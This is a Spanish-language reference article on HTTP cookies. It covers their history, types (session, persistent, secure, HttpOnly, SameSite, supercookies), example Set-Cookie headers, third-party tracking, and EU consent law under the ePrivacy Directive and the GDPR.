Articulo de referencia

Cookie HTTP

Una cookie HTTP (también llamada cookie web , cookie de Internet , cookie de navegador o simplemente cookie ) es un pequeño fragmento de datos creado por un servidor web mientra...

Página semiprotegida
Escucha este artículo

Una cookie HTTP (también llamada cookie web , cookie de Internet , cookie de navegador o simplemente cookie ) es un pequeño fragmento de datos creado por un servidor web mientras un usuario navega por un sitio web y almacenado en el ordenador u otro dispositivo del usuario mediante su navegador web . Las cookies se almacenan en el dispositivo utilizado para acceder a un sitio web, y es posible que se almacene más de una cookie en el dispositivo de un usuario durante una misma sesión.

Las cookies cumplen funciones útiles y, en ocasiones, esenciales en la web . Permiten a los servidores web almacenar información de estado (como los artículos añadidos al carrito de la compra en una tienda online ) en el dispositivo del usuario o rastrear su actividad de navegación (incluyendo clics en botones específicos, inicios de sesión o el registro de las páginas visitadas anteriormente ). [ 1 ] También pueden utilizarse para guardar información que el usuario haya introducido previamente en campos de formulario , como nombres, direcciones, contraseñas y números de tarjetas de pago , para su uso posterior.

Las cookies de autenticación son utilizadas habitualmente por los servidores web para verificar que un usuario ha iniciado sesión y con qué cuenta . Sin la cookie, los usuarios tendrían que autenticarse iniciando sesión en cada página que contenga información confidencial a la que deseen acceder. La seguridad de una cookie de autenticación generalmente depende de la seguridad del sitio web emisor y del navegador del usuario, así como de si los datos de la cookie están cifrados . Las vulnerabilidades de seguridad pueden permitir que un atacante lea los datos de una cookie , los utilice para acceder a los datos del usuario o para acceder (con las credenciales del usuario) al sitio web al que pertenece la cookie (véanse ejemplos de secuencias de comandos entre sitios y falsificación de solicitudes entre sitios ). [ 2 ]

Las cookies de seguimiento , y especialmente las cookies de seguimiento de terceros , se utilizan comúnmente como formas de recopilar registros a largo plazo del historial de navegación de las personas , una posible preocupación de privacidad que llevó a los legisladores europeos [ 3 ] y estadounidenses a tomar medidas en 2011. [ 4 ] [ 5 ] La ley europea exige que todos los sitios web dirigidos a los estados miembros de la Unión Europea obtengan el " consentimiento informado " de los usuarios antes de almacenar cookies no esenciales en su dispositivo.

Fondo

Origen del nombre

El término cookie fue acuñado por el programador de navegadores web Lou Montulli . Deriva del término magic cookie , que es un paquete de datos que un programa recibe y devuelve sin cambios, utilizado por los programadores de Unix . [ 6 ] [ 7 ]

Historia

Las cookies mágicas ya se utilizaban en informática cuando el programador Lou Montulli tuvo la idea de usarlas en comunicaciones web en junio de 1994. [ 8 ] En ese momento, era empleado de Netscape Communications , que estaba desarrollando una aplicación de comercio electrónico para MCI . Vint Cerf y John Klensin representaron a MCI en las discusiones técnicas con Netscape Communications. MCI no quería que sus servidores tuvieran que conservar estados de transacciones parciales, lo que los llevó a pedirle a Netscape que encontrara una manera de almacenar ese estado en la computadora de cada usuario. Las cookies proporcionaron una solución al problema de implementar de manera confiable un carrito de compras virtual . [ 9 ] [ 10 ]

Junto con John Giannandrea, Montulli escribió la especificación inicial de cookies de Netscape ese mismo año. La versión 0.9beta de Mosaic Netscape , publicada el 13 de octubre de 1994, [ 11 ] [ 12 ] admitía cookies. [ 10 ] El primer uso de cookies (fuera de los laboratorios) fue comprobar si los visitantes del sitio web de Netscape ya habían visitado el sitio. Montulli solicitó una patente para la tecnología de cookies en 1995, que fue concedida en 1998. [ 13 ] La compatibilidad con cookies se integró en Internet Explorer en la versión 2, publicada en octubre de 1995. [ 14 ]

La introducción de las cookies no era ampliamente conocida por el público en ese momento. En particular, las cookies se aceptaban por defecto y los usuarios no eran notificados de su presencia. [ 15 ] El público se enteró de las cookies después de que el Financial Times publicara un artículo sobre ellas el 12 de febrero de 1996. [ 16 ] Ese mismo año, las cookies recibieron mucha atención mediática, especialmente debido a las posibles implicaciones para la privacidad. Las cookies se discutieron en dos audiencias de la Comisión Federal de Comercio de EE. UU. en 1996 y 1997. [ 2 ]

El desarrollo de las especificaciones formales de cookies ya estaba en marcha. En particular, las primeras discusiones sobre una especificación formal comenzaron en abril de 1995 en la lista de correo www-talk . Se formó un grupo de trabajo especial dentro del Grupo de Trabajo de Ingeniería de Internet (IETF). Brian Behlendorf y David Kristol habían propuesto dos alternativas para introducir el estado en las transacciones HTTP . Pero el grupo, encabezado por el propio Kristol y Lou Montulli, pronto decidió utilizar la especificación de Netscape como punto de partida. En febrero de 1996, el grupo de trabajo identificó las cookies de terceros como una amenaza considerable para la privacidad. La especificación producida por el grupo se publicó finalmente como RFC 2109 en febrero de 1997. Esta especifica que las cookies de terceros no estaban permitidas en absoluto, o al menos no estaban habilitadas por defecto. [ 17 ] En ese momento, las empresas de publicidad ya estaban utilizando cookies de terceros. La recomendación sobre cookies de terceros de RFC 2109 no fue seguida por Netscape e Internet Explorer. El RFC 2109 fue sustituido por el RFC 2965 en octubre de 2000.

RFC 2965 agregó un Set-Cookie2campo de encabezado , que informalmente pasó a llamarse "cookies estilo RFC 2965" en contraposición al Set-Cookiecampo de encabezado original que se llamaba "cookies estilo Netscape". [ 18 ] [ 19 ]Set-Cookie2 sin embargo, rara vez se usó y fue obsoleto en RFC 6265 en abril de 2011, que fue escrito como una especificación definitiva para las cookies tal como se usan en el mundo real. [ 20 ] Ningún navegador moderno reconoce el Set-Cookie2campo de encabezado. [ 21 ]

Terminología

Una cookie de sesión (también conocida como cookie en memoria , cookie transitoria o cookie no persistente ) existe solo en la memoria temporal mientras el usuario navega por un sitio web. [ 22 ] Las cookies de sesión caducan o se eliminan cuando el usuario cierra el navegador web. [ 23 ] El navegador identifica las cookies de sesión por la ausencia de una fecha de caducidad asignada.

Una cookie persistente caduca en una fecha específica o tras un periodo de tiempo determinado. Durante el periodo de validez establecido por su creador, la información de la cookie se transmitirá al servidor cada vez que el usuario visite el sitio web al que pertenece o cada vez que acceda a un recurso de dicho sitio web desde otro sitio web (como un anuncio).

Por este motivo, las cookies persistentes a veces se denominan cookies de seguimiento [ 24 ] [ 25 ] porque los anunciantes pueden utilizarlas para registrar información sobre los hábitos de navegación web de un usuario durante un período prolongado. Las cookies persistentes también se utilizan para mantener a los usuarios conectados a sus cuentas en los sitios web, evitando así que tengan que volver a introducir sus credenciales en cada visita.

Una cookie segura solo puede transmitirse a través de una conexión cifrada (es decir, HTTPS ). No se pueden transmitir a través de conexiones no cifradas (es decir, HTTP ). Esto reduce la probabilidad de que la cookie sea robada mediante interceptación . Una cookie se vuelve segura al agregarle una Securebandera.

Una cookie http-only no puede ser accedida por las API del lado del cliente, como JavaScript . Esta restricción elimina la amenaza de robo de cookies mediante secuencias de comandos entre sitios (XSS). [ 26 ] Sin embargo, la cookie sigue siendo vulnerable a ataques de rastreo entre sitios (XST) y falsificación de solicitudes entre sitios (CSRF). Esta característica se le otorga a una cookie añadiéndole la HttpOnlybandera.

En 2016, Google Chrome versión 51 introdujo [ 27 ] un nuevo tipo de cookie con atributo SameSitecon posibles valores de Strict, Laxo None. [ 28 ] Con el atributo SameSite=Strict, los navegadores solo enviarían cookies a un dominio de destino que sea el mismo que el dominio de origen. Esto mitigaría eficazmente los ataques de falsificación de solicitudes entre sitios (CSRF). Con SameSite=Lax, los navegadores enviarían cookies con solicitudes a un dominio de destino incluso si es diferente del dominio de origen, pero solo para solicitudes seguras como GET (POST no es seguro) y no cookies de terceros (dentro de un iframe). El atributo SameSite=Nonepermitiría cookies de terceros (entre sitios), sin embargo, la mayoría de los navegadores requieren el atributo seguro en las cookies SameSite=None. [ 29 ]

La cookie Same-site se incorpora a un nuevo borrador de RFC para "Cookies: Mecanismo de gestión de estado HTTP" [ 30 ] para actualizar RFC 6265 (si se aprueba).

Chrome, Firefox y Edge comenzaron a admitir cookies Same-site. La clave del despliegue radica en el tratamiento de las cookies existentes sin el atributo SameSite definido. Chrome las ha estado tratando como si SameSite=None, lo que permitiría que todos los sitios web y aplicaciones funcionaran como antes. Google tenía previsto cambiar este comportamiento predeterminado SameSite=Laxen Chrome 80, cuyo lanzamiento estaba previsto para febrero de 2020, [ 31 ] pero debido al potencial de fallos en las aplicaciones y sitios web que dependen de cookies de terceros y de sitios cruzados, y a las circunstancias de la COVID-19 , Google pospuso este cambio a Chrome 84. [ 32 ] [ 33 ]

Supergalleta

Una supercookie es una cookie con origen en un dominio de nivel superior (como .com) o un sufijo público (como .co.uk). Las cookies ordinarias, por el contrario, tienen como origen un nombre de dominio específico, como example.com.

Las supercookies pueden suponer un riesgo potencial para la seguridad y, por lo tanto, los navegadores web suelen bloquearlas. Si el navegador las desbloquea, un atacante que controle un sitio web malicioso podría establecer una supercookie y potencialmente interrumpir o suplantar las solicitudes legítimas de los usuarios a otro sitio web que comparta el mismo dominio de nivel superior o sufijo público que el sitio web malicioso. Por ejemplo, una supercookie con un origen .compodría afectar maliciosamente una solicitud realizada a example.com, incluso si la cookie no se originó en example.com. Esto puede utilizarse para falsificar inicios de sesión o cambiar la información del usuario.

La Lista Pública de Sufijos [ 34 ] ayuda a mitigar el riesgo que representan las supercookies. Esta lista es una iniciativa de varios proveedores que busca proporcionar una lista precisa y actualizada de sufijos de nombres de dominio. Es posible que las versiones antiguas de los navegadores no tengan una lista actualizada y, por lo tanto, sean vulnerables a las supercookies de ciertos dominios. [ 35 ]

Otros usos

El término supercookie también se utiliza para referirse a tecnologías de seguimiento que no dependen de cookies HTTP. En agosto de 2011, se encontraron dos mecanismos de supercookie en sitios web de Microsoft: la sincronización de cookies que regeneraba cookies MUID (identificador único de máquina) y cookies ETag . [ 36 ] Debido a la atención mediática, Microsoft posteriormente deshabilitó este código. [ 37 ] En una publicación de blog de 2021, Mozilla utilizó el término supercookie para referirse al uso de la caché del navegador como medio para rastrear a los usuarios en diferentes sitios. [ 38 ]

Una cookie zombie es un conjunto de datos y código que un servidor web ha colocado en el ordenador u otro dispositivo de un visitante en una ubicación oculta fuera del área de almacenamiento de cookies del navegador del visitante , y que recrea automáticamente una cookie HTTP como una cookie normal después de que la cookie original haya sido eliminada. La cookie zombie puede almacenarse en múltiples ubicaciones, como el objeto compartido local de Flash , el almacenamiento web de HTML5 y otras ubicaciones del lado del cliente e incluso del servidor, y cuando se detecta su ausencia en una de las ubicaciones, la instancia faltante se recrea mediante el código JavaScript utilizando los datos almacenados en otras ubicaciones. [ 39 ] [ 40 ]

Estructura

Una cookie consta de los siguientes componentes: [ 41 ] [ 42 ] [ 43 ]

  1. Nombre
  2. Valor
  3. Cero o más atributos ( pares nombre/valor ). Los atributos almacenan información como la caducidad de la cookie, el dominio y las banderas (como Securey HttpOnly).

Usos

Gestión de sesiones

Las cookies se introdujeron originalmente para que los usuarios pudieran registrar los artículos que deseaban comprar mientras navegaban por un sitio web (un carrito de compras virtual o cesta de la compra ). [ 9 ] [ 10 ] Sin embargo, hoy en día, el contenido del carrito de compras de un usuario se suele almacenar en una base de datos en el servidor, en lugar de en una cookie en el cliente. Para llevar un registro de qué usuario está asignado a qué carrito de compras, el servidor envía una cookie al cliente que contiene un identificador de sesión único (normalmente, una larga cadena de letras y números aleatorios). Dado que las cookies se envían al servidor con cada solicitud que realiza el cliente, ese identificador de sesión se enviará de vuelta al servidor cada vez que el usuario visite una nueva página del sitio web, lo que le permite al servidor saber qué carrito de compras mostrar al usuario.

Otro uso común de las cookies es para iniciar sesión en sitios web. Cuando el usuario visita la página de inicio de sesión de un sitio web, el servidor web suele enviarle una cookie con un identificador de sesión único. Una vez que el usuario inicia sesión correctamente, el servidor recuerda que ese identificador de sesión específico ha sido autenticado y le otorga acceso a sus servicios.

Dado que las cookies de sesión solo contienen un identificador de sesión único, la cantidad de información personal que un sitio web puede guardar sobre cada usuario es prácticamente ilimitada; el sitio web no está sujeto a restricciones en cuanto al tamaño de las cookies. Las cookies de sesión también ayudan a mejorar los tiempos de carga de las páginas, ya que la información que contienen es pequeña y requiere poco ancho de banda.

Personalización

Las cookies se pueden usar para recordar información sobre el usuario y así mostrarle contenido relevante a lo largo del tiempo. Por ejemplo, un servidor web podría enviar una cookie con el nombre de usuario utilizado la última vez para iniciar sesión en un sitio web, de modo que se complete automáticamente la próxima vez que el usuario inicie sesión.

Muchos sitios web utilizan cookies para personalizar la experiencia según las preferencias del usuario. Los usuarios seleccionan sus preferencias introduciéndolas en un formulario web y enviándolo al servidor. El servidor codifica las preferencias en una cookie y la envía de vuelta al navegador. De esta forma, cada vez que el usuario accede a una página del sitio web, el servidor puede personalizarla según sus preferencias. Por ejemplo, el buscador de Google utilizaba cookies para permitir a los usuarios (incluso a los no registrados) decidir cuántos resultados de búsqueda querían ver por página. Asimismo, DuckDuckGo utiliza cookies para permitir a los usuarios configurar preferencias de visualización, como los colores de la página web.

Seguimiento

Las cookies de seguimiento se utilizan para rastrear los hábitos de navegación web de los usuarios. Esto también se puede hacer, hasta cierto punto, utilizando la dirección IP del ordenador que solicita la página o el campo "referer" del encabezado de la solicitud HTTP , pero las cookies permiten una mayor precisión. Esto se puede demostrar de la siguiente manera:

  1. Si el usuario solicita una página del sitio, pero la solicitud no contiene ninguna cookie, el servidor asume que es la primera página que visita. Por lo tanto, el servidor crea un identificador único (normalmente una cadena de letras y números aleatorios) y lo envía como cookie al navegador junto con la página solicitada.
  2. A partir de este momento, el navegador enviará automáticamente la cookie al servidor cada vez que se solicite una nueva página del sitio. El servidor no solo envía la página como de costumbre, sino que también almacena la URL de la página solicitada, la fecha y hora de la solicitud y la cookie en un archivo de registro.

Analizando este archivo de registro, es posible descubrir qué páginas ha visitado el usuario, en qué secuencia y durante cuánto tiempo.

Las corporaciones explotan los hábitos de navegación de los usuarios mediante el seguimiento de cookies para recopilar información sobre sus hábitos de compra. El Wall Street Journal descubrió que los cincuenta sitios web más importantes de Estados Unidos instalaron un promedio de sesenta y cuatro dispositivos de seguimiento en sus computadoras, lo que generó un total de 3180 archivos de seguimiento. [ 44 ] Estos datos pueden recopilarse y venderse a empresas interesadas.

Implementación

Una posible interacción entre un navegador web y un servidor web que aloja una página web, en la que el servidor envía una cookie al navegador y este la devuelve al solicitar otra página.

Las cookies son fragmentos de datos arbitrarios, generalmente seleccionados y enviados inicialmente por el servidor web, y almacenados en el ordenador del cliente por el navegador. El navegador los envía de vuelta al servidor con cada solicitud, introduciendo estados (memoria de eventos anteriores) en transacciones HTTP que, de otro modo, carecerían de estado . Sin cookies, cada acceso a una página web o a un componente de una página web sería un evento aislado, prácticamente sin relación con las demás páginas que el usuario visite en el sitio web. Aunque las cookies suelen ser establecidas por el servidor web, también pueden ser establecidas por el cliente mediante un lenguaje de programación como JavaScript (a menos que se haya establecido la bandera de la cookie HttpOnly, en cuyo caso esta no puede ser modificada por lenguajes de programación).

Las especificaciones de cookies [ 45 ] [ 46 ] requieren que los navegadores cumplan los siguientes requisitos para poder admitir cookies:

  • Puede admitir cookies de hasta 4.096 bytes .
  • Puede admitir al menos 50 cookies por dominio (es decir, por sitio web).
  • Puede admitir al menos 3.000 cookies en total.

Las cookies se establecen mediante el Set-Cookiecampo de encabezado que se envía en una respuesta HTTP desde el servidor web. Este campo de encabezado indica al navegador web que almacene la cookie y la envíe de vuelta en futuras solicitudes al servidor (el navegador ignorará este campo de encabezado si no admite cookies o las tiene deshabilitadas).

Como ejemplo, el navegador envía su primera solicitud HTTP para la página de inicio del www.example.orgsitio web:

GET /index.html HTTP / 1.1 Host : www.example.org ...

El servidor responde con dos Set-Cookiecampos de encabezado:

HTTP / 1.0 200 OK Content-type : text/html Set-Cookie : theme=light Set-Cookie : sessionToken=abc123; Expires=Wed, 9 Jun 2021 10:18:14 GMT ...

La respuesta HTTP del servidor contiene el contenido de la página de inicio del sitio web. Además, indica al navegador que establezca dos cookies. La primera, theme , se considera una cookie de sesión, ya que no tiene el atributo Expiresni Max-Age. Las cookies de sesión se eliminan automáticamente al cerrar el navegador. La segunda, sessionToken , se considera una cookie persistente , ya que contiene un Expiresatributo que indica al navegador que la elimine en una fecha y hora específicas.

A continuación, el navegador envía otra solicitud para visitar la spec.htmlpágina del sitio web. Esta solicitud contiene un Cookiecampo de encabezado que incluye las dos cookies que el servidor le indicó al navegador que estableciera:

GET /spec.html HTTP / 1.1 Host : www.example.org Cookie : theme=light; sessionToken=abc123 ...

De esta forma, el servidor sabe que esta solicitud HTTP está relacionada con la anterior. El servidor respondería enviando la página solicitada, posiblemente incluyendo más Set-Cookiecampos de encabezado en la respuesta HTTP para indicarle al navegador que agregue nuevas cookies, modifique las existentes o elimine las existentes. Para eliminar una cookie, el servidor debe incluir un Set-Cookiecampo de encabezado con una fecha de vencimiento anterior.

El valor de una cookie puede consistir en cualquier carácter ASCII! imprimible ( desde ~, Unicode\u0021 desde \u007E) excluyendo ,y; y los caracteres de espacio en blanco . El nombre de una cookie excluye los mismos caracteres, así como =, ya que este último actúa como delimitador entre el nombre y el valor. El estándar de cookies RFC 2965 es más restrictivo, pero no está implementado por los navegadores.

El término miga de galleta se usa a veces para referirse al par nombre-valor de una cookie. [ 47 ]

Las cookies también pueden ser establecidas por lenguajes de scripting como JavaScript que se ejecutan dentro del navegador. En JavaScript, el objeto document.cookiese utiliza para este propósito. Por ejemplo, la instrucción document.cookie = "temperature=20"crea una cookie con el nombre temperature y el valor 20. [ 48 ]

Además de un nombre y un valor, las cookies pueden tener uno o más atributos. Los navegadores no incluyen los atributos de las cookies en las solicitudes al servidor; solo envían el nombre y el valor de la cookie. Los navegadores utilizan los atributos de las cookies para determinar cuándo eliminar una cookie, bloquearla o enviarla al servidor.

Dominio y ruta

Los atributos Domainy Pathdefinen el alcance de la cookie. Básicamente, le indican al navegador a qué sitio web pertenece la cookie. Por razones de seguridad, las cookies solo se pueden establecer en el dominio principal del recurso actual y sus subdominios, y no para otro dominio y sus subdominios. Por ejemplo, el sitio web example.orgno puede establecer una cookie que tenga un dominio de foo.comporque esto le permitiría example.orgcontrolar las cookies del dominio foo.com.

DomainSi el servidor no especifica los atributos de una cookie Path, estos se establecen por defecto en el dominio y la ruta del recurso solicitado. [ 49 ] Sin embargo, en la mayoría de los navegadores existe una diferencia entre una cookie establecida foo.comsin un dominio y una cookie establecida con un foo.comdominio. En el primer caso, la cookie solo se enviará para solicitudes a foo.com, también conocida como cookie de solo host. En el segundo caso, también se incluyen todos los subdominios (por ejemplo, docs.foo.com). [ 50 ] [ 51 ] Una excepción notable a esta regla general es Edge anterior a Windows 10 RS3 e Internet Explorer anterior a IE 11 y Windows 10 RS4 (abril de 2018), que siempre envía cookies a subdominios independientemente de si la cookie se estableció con o sin un dominio. [ 52 ]

A continuación se muestra un ejemplo de algunos Set-Cookiecampos de encabezado en la respuesta HTTP de un sitio web después de que un usuario haya iniciado sesión. La solicitud HTTP se envió a una página web dentro del docs.foo.comsubdominio:

HTTP / 1.0 200 OK Set-Cookie : LSID=DQAAAK…Eaem_vYg; Path=/accounts; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly Set-Cookie : HSID=AYQEVn…DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly Set-Cookie : SSID=Ap4P…GTEq; Domain=foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly ...

La primera cookie, LSID, no tiene Domainatributo y tiene un Pathatributo establecido en /accounts. Esto le indica al navegador que use la cookie solo cuando solicite páginas contenidas en docs.foo.com/accounts(el dominio se deriva del dominio de la solicitud). Las otras dos cookies, HSIDy SSID, se usarían cuando el navegador solicite cualquier subdominio en .foo.comen cualquier ruta (por ejemplo www.foo.com/bar). El punto inicial es opcional en los estándares recientes, pero se puede agregar para compatibilidad con implementaciones basadas en RFC 2109. [ 53 ]

Caduca y edad máxima

El Expiresatributo define una fecha y hora específicas en las que el navegador debe eliminar la cookie. La fecha y la hora se especifican en el formato Wdy, DD Mon YYYY HH:MM:SS GMT, o en el formato Wdy, DD Mon YY HH:MM:SS GMTpara valores de YY donde YY es mayor o igual que 0 y menor o igual que 69. [ 54 ]

Alternativamente, el Max-Ageatributo se puede usar para establecer la caducidad de la cookie como un intervalo de segundos en el futuro, en relación con el momento en que el navegador recibió la cookie. A continuación, se muestra un ejemplo de tres Set-Cookiecampos de encabezado que se recibieron de un sitio web después de que un usuario iniciara sesión:

HTTP / 1.0 200 OK Set-Cookie : lu=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Mar, 15 Ene 2013 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly Set-Cookie : made_write_conn=1295214458; Path=/; Domain=.example.com Set-Cookie : reg_fb_gate=deleted; Expires=Thu, 1 Ene 1970 00:00:01 GMT; Path=/; Domain=.example.com; HttpOnly

La primera cookie, lu, está configurada para expirar el 15 de enero de 2013. El navegador del cliente la utilizará hasta esa fecha. La segunda cookie, made_write_conn, no tiene fecha de expiración, por lo que es una cookie de sesión. Se eliminará después de que el usuario cierre su navegador. La tercera cookie, reg_fb_gate, tiene su valor cambiado a eliminado , con una fecha de expiración anterior. El navegador eliminará esta cookie inmediatamente porque su fecha de expiración es anterior. Tenga en cuenta que la cookie solo se eliminará si los atributos de dominio y ruta en el Set-Cookiecampo coinciden con los valores utilizados cuando se creó la cookie.

A partir de 2016Internet Explorer no lo admitía Max-Age. [ 55 ] [ 56 ]

Seguro y solo HTTP

Los atributos Securey HttpOnlyno tienen valores asociados. Más bien, la presencia de sus nombres de atributo indica que sus comportamientos deben estar habilitados.

Este Secureatributo tiene como objetivo limitar la comunicación de cookies a la transmisión cifrada, indicando a los navegadores que utilicen cookies únicamente a través de conexiones seguras/cifradas . Sin embargo, si un servidor web establece una cookie con el atributo Secure desde una conexión no segura, esta aún puede ser interceptada mediante ataques de intermediario (man-in-the-middle) al enviarse al usuario . Por lo tanto, para una máxima seguridad, las cookies con el atributo Secure solo deben establecerse a través de una conexión segura.

El HttpOnlyatributo indica a los navegadores que no expongan las cookies a través de canales distintos a las solicitudes HTTP (y HTTPS). Esto significa que no se puede acceder a la cookie mediante lenguajes de scripting del lado del cliente (especialmente JavaScript ) y, por lo tanto, no se puede robar fácilmente mediante secuencias de comandos entre sitios (una técnica de ataque muy extendida). [ 57 ]

Configuración del navegador

La mayoría de los navegadores modernos admiten cookies y permiten al usuario deshabilitarlas. Las siguientes son opciones comunes: [ 58 ]

  • Para habilitar o deshabilitar completamente las cookies, de modo que siempre se acepten o siempre se bloqueen.
  • Para ver y eliminar selectivamente las cookies mediante un gestor de cookies.
  • Para borrar por completo todos los datos privados, incluidas las cookies.

También existen herramientas complementarias para gestionar los permisos de las cookies. [ 59 ] [ 60 ] [ 61 ] [ 62 ]

Las cookies tienen implicaciones importantes para la privacidad y el anonimato de los usuarios web. Si bien las cookies se envían únicamente al servidor que las crea o a un servidor del mismo dominio de Internet, una página web puede contener imágenes u otros componentes almacenados en servidores de otros dominios. Las cookies que se establecen durante la recuperación de estos componentes se denominan cookies de terceros . Una cookie de terceros pertenece a un dominio diferente al que se muestra en la barra de direcciones. Este tipo de cookie suele aparecer cuando las páginas web incluyen contenido de sitios web externos, como anuncios publicitarios . Esto abre la posibilidad de rastrear el historial de navegación del usuario y es utilizado por los anunciantes para mostrar anuncios relevantes a cada usuario.

En este ejemplo ficticio, una empresa de publicidad ha colocado banners en dos sitios web. Al alojar las imágenes de los banners en sus servidores y utilizar cookies de terceros, la empresa de publicidad puede rastrear la navegación de los usuarios en ambos sitios.

Por ejemplo, supongamos que un usuario visita www.example.org. Este sitio web contiene un anuncio de ad.foxytracking.com, que, al descargarse, establece una cookie perteneciente al dominio del anuncio ( ad.foxytracking.com). A continuación, el usuario visita otro sitio web, www.foo.com, que también contiene un anuncio de ad.foxytracking.comy establece una cookie perteneciente a ese dominio ( ad.foxytracking.com). Finalmente, ambas cookies se enviarán al anunciante al cargar sus anuncios o visitar su sitio web. El anunciante puede entonces utilizar estas cookies para crear un historial de navegación del usuario en todos los sitios web que tienen anuncios de este anunciante, mediante el uso del campo de encabezado HTTP Referer .

A partir de 2014Algunos sitios web establecían cookies legibles para más de 100 dominios de terceros. [ 63 ] En promedio, un solo sitio web establecía 10 cookies, con un número máximo de cookies (de origen y de terceros) que alcanzaba más de 800. [ 64 ]

Los estándares más antiguos para cookies, RFC 2109 [ 17 ] y RFC 2965, recomiendan que los navegadores protejan la privacidad del usuario y no permitan compartir cookies entre servidores de forma predeterminada. Sin embargo, el estándar más reciente, RFC 6265, permite explícitamente que los agentes de usuario implementen la política de cookies de terceros que deseen. La mayoría de los navegadores web modernos contienen configuraciones de privacidad que pueden bloquear las cookies de terceros. Desde 2020, Apple Safari , [ 65 ] Firefox , [ 66 ] y Brave [ 67 ] bloquean todas las cookies de terceros de forma predeterminada. Safari permite que los sitios integrados utilicen la API de acceso al almacenamiento para solicitar permiso para establecer cookies de origen. En mayo de 2020, Google Chrome 83 introdujo nuevas funciones para bloquear las cookies de terceros de forma predeterminada en su modo incógnito para la navegación privada, haciendo que el bloqueo sea opcional durante la navegación normal. La misma actualización también añadió una opción para bloquear las cookies de origen. [ 68 ] En abril de 2024, Chrome pospuso el bloqueo de cookies de terceros por defecto hasta 2025. [ 69 ] En julio de 2024, Google anunció un plan para evitar bloquear las cookies de terceros por defecto y, en su lugar, solicitar a los usuarios que permitan las cookies de terceros. [ 70 ]

Privacidad

La posibilidad de crear perfiles de usuarios supone una amenaza para la privacidad, especialmente cuando el seguimiento se realiza en múltiples dominios mediante cookies de terceros. Por este motivo, algunos países cuentan con legislación sobre cookies.

Los operadores de sitios web que no informan a los consumidores sobre el uso de cookies de terceros corren el riesgo de dañar la confianza del consumidor si se descubre dicho uso. Una divulgación clara (como en una política de privacidad ) tiende a eliminar cualquier efecto negativo derivado de este descubrimiento. [ 71 ]

El gobierno de Estados Unidos estableció normas estrictas sobre el uso de cookies en el año 2000, tras revelarse que la oficina de política antidrogas de la Casa Blanca las utilizaba para rastrear a los usuarios que visualizaban su publicidad antidrogas en línea. En 2002, el activista por la privacidad Daniel Brandt descubrió que la CIA había estado dejando cookies persistentes en los ordenadores que habían visitado su sitio web. Al ser notificada de que estaba infringiendo la normativa, la CIA declaró que estas cookies no se habían configurado intencionadamente y dejó de hacerlo. El 25 de diciembre de 2005, Brandt descubrió que la Agencia de Seguridad Nacional (NSA) había estado dejando dos cookies persistentes en los ordenadores de los visitantes debido a una actualización de software. Tras ser informada, la NSA desactivó inmediatamente las cookies. [ 72 ]

En 2002, la Unión Europea lanzó la Directiva sobre privacidad y comunicaciones electrónicas (Directiva sobre privacidad electrónica), una política que exige el consentimiento de los usuarios finales para la instalación de cookies y tecnologías similares para almacenar y acceder a información en los equipos de los usuarios. [ 73 ] [ 74 ] En particular, el artículo 5, párrafo 3, establece que el almacenamiento de datos técnicamente innecesarios en el ordenador de un usuario solo puede realizarse si se le proporciona información sobre cómo se utilizan estos datos y se le da la posibilidad de rechazar esta operación de almacenamiento. La Directiva no exige que los usuarios autoricen o reciban notificación del uso de cookies que sean funcionalmente necesarias para prestar un servicio que hayan solicitado, por ejemplo, para conservar la configuración, almacenar las sesiones de inicio de sesión o recordar el contenido de la cesta de la compra del usuario. [ 75 ]

En 2009, la ley fue modificada por la Directiva 2009/136/CE, que incluyó un cambio en el artículo 5, párrafo 3. En lugar de ofrecer a los usuarios la opción de rechazar el almacenamiento de cookies, la Directiva revisada exige la obtención del consentimiento para dicho almacenamiento. [ 74 ] La definición de consentimiento se remite a la definición de la legislación europea de protección de datos, en primer lugar la Directiva de Protección de Datos de 1995 y, posteriormente, el Reglamento General de Protección de Datos (RGPD). Dado que la definición de consentimiento se reforzó en el texto del RGPD, se incrementó la calidad del consentimiento exigido a quienes almacenan y acceden a información como las cookies en los dispositivos de los usuarios. Sin embargo, en un caso resuelto en virtud de la Directiva de Protección de Datos, el Tribunal de Justicia de la Unión Europea confirmó posteriormente que la legislación anterior implicaba la misma calidad de consentimiento que el instrumento actual. [ 76 ] Además del requisito de consentimiento que se deriva del almacenamiento o acceso a información en el dispositivo terminal de un usuario, la información contenida en muchas cookies se considerará datos personales en virtud del RGPD y requerirá una base jurídica para su tratamiento. Esto ha sido así desde la Directiva de Protección de Datos de 1995, que utilizaba una definición idéntica de datos personales, si bien el RGPD, en el considerando interpretativo 30, aclara que los identificadores de cookies están incluidos. Aunque no todo tratamiento de datos según el RGPD requiere consentimiento, las características de la publicidad conductual hacen que sea difícil o imposible justificarla por cualquier otro motivo. [ 77 ] [ 78 ]

El consentimiento bajo la combinación del RGPD y la Directiva sobre privacidad electrónica debe cumplir una serie de condiciones en relación con las cookies. [ 79 ] Debe ser otorgado libremente y sin ambigüedades: las casillas premarcadas fueron prohibidas tanto por la Directiva de Protección de Datos de 1995 [ 76 ] como por el RGPD (Considerando 32). [ 80 ] El RGPD especifica que el consentimiento debe ser tan «fácil de retirar como de otorgar», [ 80 ] lo que significa que un botón de «rechazar todo» debe ser tan fácil de acceder en términos de clics y visibilidad como un botón de «aceptar todo». [ 79 ] Debe ser específico e informado, lo que significa que el consentimiento se relaciona con fines particulares para el uso de estos datos, y todas las organizaciones que buscan utilizar este consentimiento deben ser nombradas específicamente. [ 81 ] [ 82 ] El Tribunal de Justicia de la Unión Europea también ha dictaminado que el consentimiento debe ser «eficiente y oportuno», lo que significa que debe obtenerse antes de que se instalen las cookies y comience el procesamiento de datos, en lugar de después. [ 83 ]

La respuesta del sector ha sido mayoritariamente negativa. Robert Bond, del bufete Speechly Bircham, describe los efectos como «de gran alcance e increíblemente onerosos» para «todas las empresas del Reino Unido». Simon Davis, de Privacy International, sostiene que una aplicación adecuada «destruiría todo el sector». [ 84 ] Sin embargo, los expertos señalan que la naturaleza onerosa de las ventanas emergentes de cookies se debe al intento de mantener un modelo de negocio mediante solicitudes complejas que pueden ser incompatibles con el RGPD. [ 77 ]

